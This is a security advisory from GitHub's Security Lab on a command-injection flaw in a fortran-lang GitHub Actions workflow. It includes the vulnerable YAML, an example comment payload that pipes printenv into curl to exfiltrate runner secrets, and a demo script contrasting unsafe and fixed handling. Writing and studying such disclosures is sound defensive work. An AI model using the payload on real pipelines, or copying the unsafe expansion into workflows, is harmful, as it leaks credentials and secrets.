February 3, 2021

GHSL-2020-190: Command injection in fortran-lang/ workflow

Jaroslav Lobacevski

Coordinated Disclosure Timeline


The ‘gen_tweet.yaml’ GitHub workflow is vulnerable to arbitrary command injection.


fortran-lang/ GitHub repository

Tested Version

gen_tweet.yaml from the master branch.


Issue: A public GitHub issue comment is used to format a shell command

When a user comments on a pull request with text beginning with `#tweet`, the gen_tweet.yaml GitHub workflow starts automatically. The comment text is expanded by the `${{ }}` expression directly into the bash script of the run step:

    runs-on: ubuntu-latest
    if: github.event.issue.pull_request && startsWith(github.event.comment.body,'#tweet')
    steps:
    - name: extract the new tweet message
      id: get-comment-body
      run: |
        body=$(echo "${{github.event.comment.body}}" | sed '1 s/#tweet//' | sed '1 s/ //')


Because the expression is substituted into the script text before bash parses it, any shell syntax in the comment becomes part of the script, which allows arbitrary command injection. For example, a user may comment with #tweet `printenv | curl -X POST --data-binary @-`, which exfiltrates the runner's environment variables to the attacker-controlled server. To make the attack less visible, the attacker may edit the comment afterwards.
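The following added example (not code from the fortran-lang workflow) reproduces the extraction step in both forms: the vulnerable one, where the comment body is spliced into the script text the way `${{ }}` expansion does, and a hardened one that hands the body to the script only through an environment variable (the variable name `BODY` and the comment bodies are constructed for the demonstration).

```shell
#!/usr/bin/env bash
# Added example, not the fortran-lang workflow itself. The comment bodies
# used below are constructed for this demonstration.

# Mirrors what the runner does with "${{ github.event.comment.body }}" in a
# run: script: the expression is substituted into the script text before
# bash parses it, so shell syntax in the comment becomes part of the script.
extract_unsafe() {
    script="body=\$(echo \"$1\" | sed '1 s/#tweet//' | sed '1 s/ //'); printf '%s' \"\$body\""
    bash -c "$script"
}

# Hardened form. In the workflow this corresponds to
#     env:
#       BODY: ${{ github.event.comment.body }}
#     run: body=$(printf '%s\n' "$BODY" | sed '1 s/#tweet//' | sed '1 s/ //')
# The body reaches the script only as the value of an environment variable,
# which bash treats as data, never as code. printf replaces echo so that a
# body starting with "-n" or "-e" is not mistaken for an option.
extract_safe() {
    BODY="$1" bash -c 'body=$(printf "%s\n" "$BODY" | sed "1 s/#tweet//" | sed "1 s/ //"); printf "%s" "$body"'
}

# Demonstration with a benign command substitution placed in the comment.
comment='#tweet `echo INJECTED`'
echo "unsafe: $(extract_unsafe "$comment")"   # prints: unsafe: INJECTED (the backticks ran)
echo "safe:   $(extract_safe "$comment")"     # prints: safe:   `echo INJECTED` (kept as text)
```

The same env-variable pattern applies to every other attacker-controlled event field (issue title, PR body, branch name) that a workflow would otherwise expand inside `run:`.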


This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).


You can contact the GHSL team at, please include a reference to GHSL-2020-190 in any communication regarding this issue.